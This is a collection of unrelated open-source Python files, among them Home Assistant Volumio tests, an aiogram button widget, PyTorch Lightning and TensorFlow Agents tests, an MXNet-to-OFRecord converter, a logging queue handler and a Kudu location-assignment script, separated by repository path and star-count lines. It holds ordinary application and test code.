"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == "TestVolumio"
assert result2["data"] == {**TEST_SYSTEM_INFO, **TEST_CONNECTION}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_updates_unique_id(hass):
"""Test a duplicate id aborts and updates existing entry."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_SYSTEM_INFO["id"],
data={
"host": "dummy",
"port": 11,
"name": "dummy",
"id": TEST_SYSTEM_INFO["id"],
},
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
assert entry.data == {**TEST_SYSTEM_INFO, **TEST_CONNECTION}
async def test_empty_system_info(hass):
"""Test old volumio versions with empty system info."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value={},
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_CONNECTION["host"]
assert result2["data"] == {
"host": TEST_CONNECTION["host"],
"port": TEST_CONNECTION["port"],
"name": TEST_CONNECTION["host"],
"id": None,
}
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_cannot_connect(hass):
"""Test we handle cannot connect error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=CannotConnectError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "cannot_connect"}
async def test_form_exception(hass):
"""Test we handle generic error."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_USER}
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=Exception,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
TEST_CONNECTION,
)
assert result2["type"] == "form"
assert result2["errors"] == {"base": "unknown"}
async def test_discovery(hass):
"""Test discovery flow works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
return_value=TEST_SYSTEM_INFO,
), patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={},
)
await hass.async_block_till_done()
assert result2["type"] == "create_entry"
assert result2["title"] == TEST_DISCOVERY_RESULT["name"]
assert result2["data"] == TEST_DISCOVERY_RESULT
assert result2["result"]
assert result2["result"].unique_id == TEST_DISCOVERY_RESULT["id"]
assert len(mock_setup_entry.mock_calls) == 1
async def test_discovery_cannot_connect(hass):
"""Test discovery aborts if cannot connect."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
with patch(
"homeassistant.components.volumio.config_flow.Volumio.get_system_info",
side_effect=CannotConnectError,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input={},
)
assert result2["type"] == "abort"
assert result2["reason"] == "cannot_connect"
async def test_discovery_duplicate_data(hass):
"""Test discovery aborts if same mDNS packet arrives."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
assert result["type"] == "form"
assert result["step_id"] == "discovery_confirm"
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": config_entries.SOURCE_ZEROCONF}, data=TEST_DISCOVERY
)
assert result["type"] == "abort"
assert result["reason"] == "already_in_progress"
async def test_discovery_updates_unique_id(hass):
"""Test a duplicate discovery id aborts and updates existing entry."""
entry = MockConfigEntry(
domain=DOMAIN,
unique_id=TEST_DISCOVERY_RESULT["id"],
data={
"host": "dummy",
"port": 11,
"name": "dummy",
"id": TEST_DISCOVERY_RESULT["id"],
},
state=config_entries.ConfigEntryState.SETUP_RETRY,
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.volumio.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_ZEROCONF},
data=TEST_DISCOVERY,
)
await hass.async_block_till_done()
assert result["type"] == "abort"
assert result["reason"] == "already_configured"
assert entry.data == TEST_DISCOVERY_RESULT
assert len(mock_setup_entry.mock_calls) == 1
|
aiogram_dialog/widgets/kbd/button.py
|
SamWarden/aiogram_dialog
| 198 |
129178
|
from typing import List, Callable, Optional, Union, Dict, Awaitable, Any
from aiogram.types import InlineKeyboardButton, CallbackQuery
from aiogram_dialog.dialog import Dialog
from aiogram_dialog.manager.manager import DialogManager
from aiogram_dialog.widgets.text import Text
from aiogram_dialog.widgets.widget_event import WidgetEventProcessor, ensure_event_processor
from .base import Keyboard
from ..when import WhenCondition
OnClick = Callable[[CallbackQuery, "Button", DialogManager], Awaitable]
class Button(Keyboard):
def __init__(self, text: Text, id: str,
on_click: Union[OnClick, WidgetEventProcessor, None] = None,
when: WhenCondition = None):
super().__init__(id, when)
self.text = text
self.on_click = ensure_event_processor(on_click)
async def process_callback(self, c: CallbackQuery, dialog: Dialog, manager: DialogManager) -> bool:
if c.data != self.widget_id:
return False
await self.on_click.process_event(c, self, manager)
return True
async def _render_keyboard(self, data: Dict, manager: DialogManager) -> List[List[InlineKeyboardButton]]:
return [[
InlineKeyboardButton(
text=await self.text.render_text(data, manager),
callback_data=self.widget_id
)
]]
class Url(Keyboard):
def __init__(self, text: Text, url: Text, id: Optional[str] = None, when: Union[str, Callable, None] = None):
super().__init__(id, when)
self.text = text
self.url = url
async def _render_keyboard(self, data: Dict, manager: DialogManager) -> List[List[InlineKeyboardButton]]:
return [[
InlineKeyboardButton(
text=await self.text.render_text(data, manager),
url=await self.url.render_text(data, manager)
)
]]
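# --- Illustrative usage sketch (not part of the original module) ---
# A hypothetical click handler and two widgets wired together. `Const` is the
# static-text widget shipped with aiogram_dialog; the handler name and URL are
# made up. In a real bot these widgets would be placed inside a Window/Dialog
# and registered with a DialogRegistry; that wiring is omitted, and because
# this module uses relative imports the snippet is meant to be read as a
# sketch rather than executed directly.
if __name__ == "__main__":
    from aiogram_dialog.widgets.text import Const

    async def on_hello(c: CallbackQuery, button: Button, manager: DialogManager) -> None:
        await c.answer("Hello!")

    hello_button = Button(Const("Say hello"), id="hello", on_click=on_hello)
    docs_link = Url(Const("Project page"), Const("https://github.com/Tishka17/aiogram_dialog"))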
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_platform.py
|
Maikor/ydk-py
| 177 |
129191
|
""" Cisco_IOS_XE_platform
Cisco XE Native Platform Yang model.
Copyright (c) 2016, 2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
|
tests/plugins/precision/test_deepspeed_precision.py
|
mathemusician/pytorch-lightning
| 3,469 |
129202
|
<filename>tests/plugins/precision/test_deepspeed_precision.py
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import pytest
from pytorch_lightning.plugins.precision.deepspeed import DeepSpeedPrecisionPlugin
from pytorch_lightning.utilities.exceptions import MisconfigurationException
def test_invalid_precision_with_deepspeed_precision():
with pytest.raises(ValueError, match="is not supported. `precision` must be one of"):
DeepSpeedPrecisionPlugin(precision=64, amp_type="native")
@mock.patch("pytorch_lightning.plugins.precision.deepspeed._DEEPSPEED_GREATER_EQUAL_0_6", False)
def test_incompatible_bfloat16_raises_error_with_deepspeed_version():
with pytest.raises(MisconfigurationException, match="is not supported with `deepspeed < v0.6`"):
DeepSpeedPrecisionPlugin(precision="bf16", amp_type="native")
|
agents/tools/simulate_test.py
|
DoxasticFox/batch-ppo
| 210 |
129238
|
<reponame>DoxasticFox/batch-ppo
# Copyright 2017 The TensorFlow Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the simulation operation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from agents import tools
class SimulateTest(tf.test.TestCase):
def test_done_automatic(self):
batch_env = self._create_test_batch_env((1, 2, 3, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, log=False, reset=False)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
self.assertAllEqual([True, False, False, False], sess.run(done))
self.assertAllEqual([True, True, False, False], sess.run(done))
self.assertAllEqual([True, False, True, False], sess.run(done))
self.assertAllEqual([True, True, False, True], sess.run(done))
def test_done_forced(self):
reset = tf.placeholder_with_default(False, ())
batch_env = self._create_test_batch_env((2, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, False, reset)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
self.assertAllEqual([False, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done, {reset: True}))
self.assertAllEqual([True, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done, {reset: True}))
self.assertAllEqual([True, False], sess.run(done))
self.assertAllEqual([False, False], sess.run(done))
self.assertAllEqual([True, True], sess.run(done))
def test_reset_automatic(self):
batch_env = self._create_test_batch_env((1, 2, 3, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, log=False, reset=False)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
for _ in range(10):
sess.run(done)
self.assertAllEqual([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], batch_env[0].steps)
self.assertAllEqual([2, 2, 2, 2, 2], batch_env[1].steps)
self.assertAllEqual([3, 3, 3, 1], batch_env[2].steps)
self.assertAllEqual([4, 4, 2], batch_env[3].steps)
def test_reset_forced(self):
reset = tf.placeholder_with_default(False, ())
batch_env = self._create_test_batch_env((2, 4))
algo = tools.MockAlgorithm(batch_env)
done, _, _ = tools.simulate(batch_env, algo, False, reset)
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(done)
sess.run(done, {reset: True})
sess.run(done)
sess.run(done, {reset: True})
sess.run(done)
sess.run(done)
sess.run(done)
self.assertAllEqual([1, 2, 2, 2], batch_env[0].steps)
self.assertAllEqual([1, 2, 4], batch_env[1].steps)
def _create_test_batch_env(self, durations):
envs = []
for duration in durations:
env = tools.MockEnvironment(
observ_shape=(2, 3), action_shape=(3,),
min_duration=duration, max_duration=duration)
env = tools.wrappers.ConvertTo32Bit(env)
envs.append(env)
batch_env = tools.BatchEnv(envs, blocking=True)
batch_env = tools.InGraphBatchEnv(batch_env)
return batch_env
if __name__ == '__main__':
tf.test.main()
|
lstm_code/nicodjimenez/test2.py
|
drpreetyrai/ChatBotCourse
| 5,087 |
129265
|
import numpy as np
import sys
from lstm import LstmParam, LstmNetwork
class ToyLossLayer:
"""
Computes square loss with first element of hidden layer array.
"""
@classmethod
    def loss(cls, pred, label):
return (pred[0] - label) ** 2
@classmethod
    def bottom_diff(cls, pred, label):
diff = np.zeros_like(pred)
diff[0] = 2 * (pred[0] - label)
return diff
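# Worked example for ToyLossLayer (an illustrative sketch; the numbers are
# assumed, not taken from the training run below):
#   pred = np.array([0.3, 0.1]); label = 0.5
#   loss(pred, label)        == (0.3 - 0.5) ** 2 == 0.04
#   bottom_diff(pred, label) == [2 * (0.3 - 0.5), 0.0] == [-0.4, 0.0]
# Only the first element of the hidden state receives a gradient, matching the
# docstring above.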
class Primes:
def __init__(self):
self.primes = list()
for i in range(2, 100):
is_prime = True
for j in range(2, i-1):
if i % j == 0:
is_prime = False
if is_prime:
self.primes.append(i)
self.primes_count = len(self.primes)
def get_sample(self, x_dim, y_dim, index):
result = np.zeros((x_dim+y_dim))
for i in range(index, index + x_dim + y_dim):
result[i-index] = self.primes[i%self.primes_count]/100.0
return result
def example_0():
mem_cell_ct = 100
x_dim = 50
concat_len = x_dim + mem_cell_ct
lstm_param = LstmParam(mem_cell_ct, x_dim)
lstm_net = LstmNetwork(lstm_param)
primes = Primes()
x_list = []
y_list = []
for i in range(0, 10):
sample = primes.get_sample(x_dim, 1, i)
x = sample[0:x_dim]
y = sample[x_dim:x_dim+1].tolist()[0]
x_list.append(x)
y_list.append(y)
for cur_iter in range(10000):
if cur_iter % 1000 == 0:
print "y_list=", y_list
for ind in range(len(y_list)):
lstm_net.x_list_add(x_list[ind])
if cur_iter % 1000 == 0:
print "y_pred[%d] : %f" % (ind, lstm_net.lstm_node_list[ind].state.h[0])
loss = lstm_net.y_list_is(y_list, ToyLossLayer)
if cur_iter % 1000 == 0:
print "loss: ", loss
lstm_param.apply_diff(lr=0.01)
lstm_net.x_list_clear()
if __name__ == "__main__":
example_0()
|
recognition/arcface_oneflow/tools/dataset_convert/mx_recordio_2_ofrecord_shuffled_npart.py
|
Intsigstephon/insightface
| 12,377 |
129294
|
<reponame>Intsigstephon/insightface<gh_stars>1000+
import os
import sys
import struct
import argparse
import numbers
import random
from mxnet import recordio
import oneflow.core.record.record_pb2 as of_record
def parse_arguement(argv):
parser = argparse.ArgumentParser()
parser.add_argument(
"--data_dir",
type=str,
default="insightface/datasets/faces_emore",
help="Root directory to mxnet dataset.",
)
parser.add_argument(
"--output_filepath",
type=str,
default="./ofrecord",
help="Path to output OFRecord.",
)
parser.add_argument(
"--num_part",
type=int,
default=96,
help="num_part of OFRecord to generate.",
)
return parser.parse_args(argv)
def load_train_data(data_dir):
path_imgrec = os.path.join(data_dir, "train.rec")
path_imgidx = path_imgrec[0:-4] + ".idx"
print(
"Loading recordio {}\n\
Corresponding record idx is {}".format(
path_imgrec, path_imgidx
)
)
imgrec = recordio.MXIndexedRecordIO(
path_imgidx, path_imgrec, "r", key_type=int
)
# Read header0 to get some info.
identity_key_start = 0
identity_key_end = 0
imgidx_list = []
id2range = {}
rec0 = imgrec.read_idx(0)
header0, img_str = recordio.unpack(rec0)
if header0.flag > 0:
identity_key_start = int(header0.label[0])
identity_key_end = int(header0.label[1])
imgidx_list = range(1, identity_key_start)
# Read identity id range
for identity in range(identity_key_start, identity_key_end):
rec = imgrec.read_idx(identity)
header, s = recordio.unpack(rec)
a, b = int(header.label[0]), int(header.label[1])
id2range[identity] = (a, b)
else:
imgidx_list = imgrec.keys
return imgrec, imgidx_list
def convert_to_ofrecord(img_data):
""" Convert python dictionary formath data of one image to of.Example proto.
Args:
img_data: Python dict.
Returns:
example: The converted of.Exampl
"""
def _int32_feature(value):
"""Wrapper for inserting int32 features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(int32_list=of_record.Int32List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(float_list=of_record.FloatList(value=value))
def _double_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return of_record.Feature(double_list=of_record.DoubleList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
# if isinstance(value, six.string_types):
# value = six.binary_type(value, encoding='utf-8')
return of_record.Feature(bytes_list=of_record.BytesList(value=[value]))
example = of_record.OFRecord(
feature={
"label": _int32_feature(img_data["label"]),
"encoded": _bytes_feature(img_data["pixel_data"]),
}
)
return example
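# Minimal usage sketch for convert_to_ofrecord (the values are assumed, not
# part of the original converter); main() below performs the same steps and
# additionally length-prefixes each serialized record with struct.pack("q", size):
#   img_data = {"label": 3, "pixel_data": b"<jpeg bytes>"}
#   example = convert_to_ofrecord(img_data)
#   payload = example.SerializeToString()
#   record = struct.pack("q", example.ByteSize()) + payload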
def main(args):
# Convert recordio to ofrecord
imgrec, imgidx_list = load_train_data(data_dir=args.data_dir)
imgidx_list = list(imgidx_list)
random.shuffle(imgidx_list)
output_dir = os.path.join(args.output_filepath, "train")
if not os.path.exists(output_dir):
os.makedirs(output_dir)
num_images = len(imgidx_list)
    num_images_per_part = (num_images + args.num_part - 1) // args.num_part  # ceil(num_images / num_part)
print("num_images", num_images, "num_images_per_part", num_images_per_part)
for part_id in range(args.num_part):
part_name = "part-" + "{:0>5d}".format(part_id)
output_file = os.path.join(output_dir, part_name)
file_idx_start = part_id * num_images_per_part
file_idx_end = min((part_id + 1) * num_images_per_part, num_images)
print("part-"+str(part_id), "start", file_idx_start, "end", file_idx_end)
with open(output_file, "wb") as f:
for file_idx in range(file_idx_start, file_idx_end):
idx = imgidx_list[file_idx]
if idx % 10000 == 0:
print(
"Converting images: {} of {}".format(
idx, len(imgidx_list)
)
)
img_data = {}
rec = imgrec.read_idx(idx)
header, s = recordio.unpack(rec)
label = header.label
if not isinstance(label, numbers.Number):
label = label[0]
img_data["label"] = int(label)
img_data["pixel_data"] = s
example = convert_to_ofrecord(img_data)
size = example.ByteSize()
f.write(struct.pack("q", size))
f.write(example.SerializeToString())
if __name__ == "__main__":
main(parse_arguement(sys.argv[1:]))
|
client/verta/verta/_swagger/_public/modeldb/versioning/model/VersioningS3DatasetDiff.py
|
CaptEmulation/modeldb
| 835 |
129295
|
<reponame>CaptEmulation/modeldb<gh_stars>100-1000
# THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class VersioningS3DatasetDiff(BaseType):
def __init__(self, path=None):
required = {
"path": False,
}
self.path = path
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .VersioningPathDatasetDiff import VersioningPathDatasetDiff
tmp = d.get('path', None)
if tmp is not None:
d['path'] = VersioningPathDatasetDiff.from_json(tmp)
return VersioningS3DatasetDiff(**d)
|
elliot/utils/logger_util.py
|
gategill/elliot
| 175 |
129296
|
<reponame>gategill/elliot
import atexit
from logging.config import ConvertingList, ConvertingDict, valid_ident
from logging.handlers import QueueHandler, QueueListener
from queue import Queue
def _resolve_handlers(l):
if not isinstance(l, ConvertingList):
return l
# Indexing the list performs the evaluation.
return [l[i] for i in range(len(l))]
def _resolve_queue(q):
if not isinstance(q, ConvertingDict):
return q
if '__resolved_value__' in q:
return q['__resolved_value__']
cname = q.pop('class')
klass = q.configurator.resolve(cname)
props = q.pop('.', None)
kwargs = {k: q[k] for k in q if valid_ident(k)}
result = klass(**kwargs)
if props:
for name, value in props.items():
setattr(result, name, value)
q['__resolved_value__'] = result
return result
class QueueListenerHandler(QueueHandler):
    """QueueHandler that owns a background QueueListener forwarding queued records to the wrapped handlers."""
def __init__(self, handlers, respect_handler_level=False, auto_run=True, queue=Queue(-1)):
queue = _resolve_queue(queue)
super().__init__(queue)
handlers = _resolve_handlers(handlers)
self._listener = QueueListener(
self.queue,
*handlers,
respect_handler_level=respect_handler_level)
if auto_run:
self.start()
atexit.register(self.stop)
def start(self):
self._listener.start()
def stop(self):
self._listener.stop()
def emit(self, record):
return super().emit(record)
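# One way this handler is typically wired up through logging.config.dictConfig
# (an illustrative sketch; the keys and names below are assumptions, not taken
# from this repository's configuration):
#   import logging.config
#   LOGGING = {
#       "version": 1,
#       "objects": {"queue": {"class": "queue.Queue", "maxsize": 1000}},
#       "handlers": {
#           "console": {"class": "logging.StreamHandler"},
#           "queued_console": {
#               "class": "elliot.utils.logger_util.QueueListenerHandler",
#               "handlers": ["cfg://handlers.console"],
#               "queue": "cfg://objects.queue",
#           },
#       },
#       "root": {"level": "INFO", "handlers": ["queued_console"]},
#   }
#   logging.config.dictConfig(LOGGING)
# The cfg:// references arrive as ConvertingList/ConvertingDict instances,
# which is what _resolve_handlers and _resolve_queue above unwrap.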
|
src/plotman/_tests/plot_util_test.py
|
pieterhelsen/plotman
| 1,016 |
129342
|
<filename>src/plotman/_tests/plot_util_test.py
import os
import pyfakefs
from plotman import plot_util
from plotman.plot_util import GB
def test_human_format() -> None:
assert plot_util.human_format(3442000000, 0) == "3G"
assert plot_util.human_format(3542000, 2) == "3.54M"
assert plot_util.human_format(354, 0) == "354"
assert plot_util.human_format(354, 0, True) == "354"
assert plot_util.human_format(354, 2) == "354.00"
assert plot_util.human_format(422399296143, 2) == "422.40G"
assert plot_util.human_format(422399296143, 2, True) == "393.39Gi"
def test_time_format() -> None:
assert plot_util.time_format(34) == "34s"
assert plot_util.time_format(59) == "59s"
assert plot_util.time_format(60) == "0:01"
assert plot_util.time_format(119) == "0:01"
assert plot_util.time_format(120) == "0:02"
assert plot_util.time_format(3694) == "1:01"
def test_split_path_prefix() -> None:
assert plot_util.split_path_prefix([]) == ("", [])
assert plot_util.split_path_prefix(["/a/0", "/b/1", "/c/2"]) == (
"",
["/a/0", "/b/1", "/c/2"],
)
assert plot_util.split_path_prefix(["/a/b/0", "/a/b/1", "/a/b/2"]) == (
"/a/b",
["0", "1", "2"],
)
def test_columns() -> None:
assert plot_util.column_wrap(list(range(8)), 3, filler="--") == [
[0, 3, 6],
[1, 4, 7],
[2, 5, "--"],
]
assert plot_util.column_wrap(list(range(9)), 3, filler="--") == [
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
]
assert plot_util.column_wrap(list(range(3)), 1, filler="--") == [[0], [1], [2]]
def test_list_plots(fs: pyfakefs.fake_filesystem.FakeFilesystem) -> None:
fs.create_file("/t/plot-k32-0.plot", st_size=108 * GB)
fs.create_file("/t/plot-k32-1.plot", st_size=108 * GB)
fs.create_file("/t/.plot-k32-2.plot", st_size=108 * GB)
fs.create_file("/t/plot-k32-3.plot.2.tmp", st_size=108 * GB)
fs.create_file("/t/plot-k32-4.plot", st_size=100 * GB)
fs.create_file("/t/plot-k32-5.plot", st_size=108 * GB)
fs.create_file("/t/plot-k33-6.plot", st_size=108 * GB)
fs.create_file("/t/plot-k33-7.plot", st_size=216 * GB)
assert plot_util.list_plots("/t/") == [
"/t/plot-k32-0.plot",
"/t/plot-k32-1.plot",
"/t/plot-k32-5.plot",
"/t/plot-k33-7.plot",
]
def test_get_plotsize() -> None:
assert [659272492, 107287518791, 221143636517, 455373353413, 936816632588] == [
plot_util.get_plotsize(n) for n in [25, 32, 33, 34, 35]
]
|
src/kudu/scripts/assign-location.py
|
attilabukor/kudu
| 1,538 |
129346
|
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import argparse
import errno
import fcntl
import json
import time
import random
# This is a simple sequencer to be run as a location assignment script
# by a Kudu master. The script can be used in location-aware test scenarios
# and other cases when location assignment rules are specified simply as the
# distribution of tablet servers among locations: i.e. how many tablet
# servers should be in every specified location (see below for an example).
#
# The script takes as input location mapping rules and an identifier.
# On success, the script prints the location assigned to the specified
# identifier to stdout. The identifier might be any string uniquely identifying
# a tablet server.
#
# Locations are assigned based on:
# a) Location mapping rules specified in the command line and sequencer's
# offset persistently stored in a state file.
# b) Previously established and persisted { id, location } mappings in the
# state file.
#
# Once assigned, the location for the specified identifier is recorded and
# output again upon next call of the script for the same identifier.
#
# It's safe to run multiple instances of the script concurrently with the
# same set of parameters. The access to the sequencer's state file is
# serialized and the script produces consistent results for all concurrent
# callers.
#
# A location mapping rule is specified as a pair 'loc:num', where the 'num'
# stands for the number of servers to assign to the location 'loc'. Location
# mapping rules are provided to the script by --map 'loc:num' command line
# arguments.
#
# Below is an example of invocation of the script for location mapping rules
# specifying that location 'l0' should have one tablet server, location 'l1'
# should have two, and location 'l2' should have three. The script is run
# to assign a location for a tablet server running at IP address 127.1.2.3.
#
# assign-location.py --map l0:1 --map l1:2 --map l2:3 127.1.2.3
#
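# As a concrete illustration of the rules above (the values are assumed for the
# example): '--map l0:1 --map l1:2 --map l2:3' expands into the location list
# ['l0', 'l1', 'l1', 'l2', 'l2', 'l2']; the i-th distinct identifier (i = 0..5)
# is assigned locations[i], and a seventh identifier raises an error unless
# --relaxed is given, in which case it receives an empty location.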
class LocationAssignmentRule(object):
def __init__(self, location_mapping_rules):
# Convert the input location information into an auxiliary array of
# location strings.
self.location_mapping_rules = location_mapping_rules
if self.location_mapping_rules is None:
self.location_mapping_rules = []
self.locations = []
self.total_count = 0
seen_locations = []
for info in self.location_mapping_rules:
location, server_num_str = info.split(':')
seen_locations.append(location)
server_num = int(server_num_str)
for i in range(0, server_num):
self.total_count += 1
self.locations.append(location)
assert (len(set(seen_locations)) == len(seen_locations)), \
'duplicate locations specified: {0}'.format(seen_locations)
def get_location(self, idx):
"""
Get location for the specified index.
"""
if self.locations:
return self.locations[idx % len(self.locations)]
else:
return ""
def acquire_advisory_lock(fpath):
"""
Acquire a lock on a special .lock file. Don't block while trying: return
if failed to acquire a lock in 30 seconds.
"""
timeout_seconds = 30
now = time.time()
deadline = now + timeout_seconds
random.seed(int(now))
fpath_lock_file = fpath + ".lock"
# Open the lock file; create the file if doesn't exist.
lock_file = open(fpath_lock_file, 'w+')
got_lock = False
while time.time() < deadline:
try:
fcntl.flock(lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
got_lock = True
break
except IOError as e:
if e.errno != errno.EAGAIN:
raise
else:
time.sleep(random.uniform(0.001, 0.100))
if not got_lock:
raise Exception('could not obtain exclusive lock for {} in {} seconds',
fpath_lock_file, timeout_seconds)
return lock_file
def get_location(fpath, rule, uid, relaxed):
"""
Return location for the specified identifier 'uid'. To do that, use the
specified location mapping rules and the information stored
in the sequencer's state file.
* Obtain advisory lock for the state file (using additional .lock file)
* If the sequencer's state file exists:
1. Open the state file in read-only mode.
2. Read the information from the state file and search for location
assigned to the server with the specified identifier.
a. If already assigned location found:
-- Return the location.
b. If location assigned to the identifier is not found:
-- Use current sequence number 'seq' to assign next location
by calling LocationAssignmentRule.get_location(seq).
-- Add the newly generated location assignment into the
sequencer's state.
-- Increment the sequence number.
-- Reopen the state file for writing (if file exists)
-- Rewrite the file with the new state of the sequencer.
-- Return the newly assigned location.
* If the sequencer's state file does not exist:
1. Set sequence number 'seq' to 0.
2. Use current sequence number 'seq' to assign next location
by calling LocationAssignmentRule.get_location(seq).
3. Update the sequencer's state accordingly.
    4. Rewrite the file with the new state of the sequencer.
    5. Return the newly assigned location.
"""
lock_file = acquire_advisory_lock(fpath)
state_file = None
try:
state_file = open(fpath)
except IOError as e:
if e.errno != errno.ENOENT:
raise
new_assignment = False
if state_file is None:
seq = 0
state = {}
state['seq'] = seq
state['mapping_rules'] = rule.location_mapping_rules
state['mappings'] = {}
mappings = state['mappings']
new_assignment = True
else:
# If the file exists, it must have proper content.
state = json.load(state_file)
seq = state.get('seq')
mapping_rules = state.get('mapping_rules')
# Make sure the stored mapping rule corresponds to the specified in args.
rule_stored = json.dumps(mapping_rules)
rule_specified = json.dumps(rule.location_mapping_rules)
if rule_stored != rule_specified:
raise Exception('stored and specified mapping rules mismatch: '
'{0} vs {1}'.format(rule_stored, rule_specified))
mappings = state['mappings']
location = mappings.get(uid, None)
if location is None:
seq += 1
state['seq'] = seq
new_assignment = True
if not new_assignment:
return location
if not relaxed and rule.total_count != 0 and rule.total_count <= seq:
raise Exception('too many unique identifiers ({0}) to assign next location '
'to {1} using mapping rules {2}. State: {3}'.format(
seq + 1, uid, rule.location_mapping_rules, json.dumps(state)))
if relaxed and rule.total_count <= seq:
return ""
# Get next location and add the { uid, location} binding into the mappings.
location = rule.get_location(seq)
mappings[uid] = location
# Rewrite the file with the updated state information.
if state_file is not None:
state_file.close()
state_file = open(fpath, 'w+')
json.dump(state, state_file)
state_file.close()
lock_file.close()
return location
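# Shape of the sequencer state persisted by get_location() above (the field
# values are assumed, for illustration only):
#   {"seq": 2,
#    "mapping_rules": ["l0:1", "l1:2", "l2:3"],
#    "mappings": {"127.1.2.3": "l0", "127.1.2.4": "l1"}}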
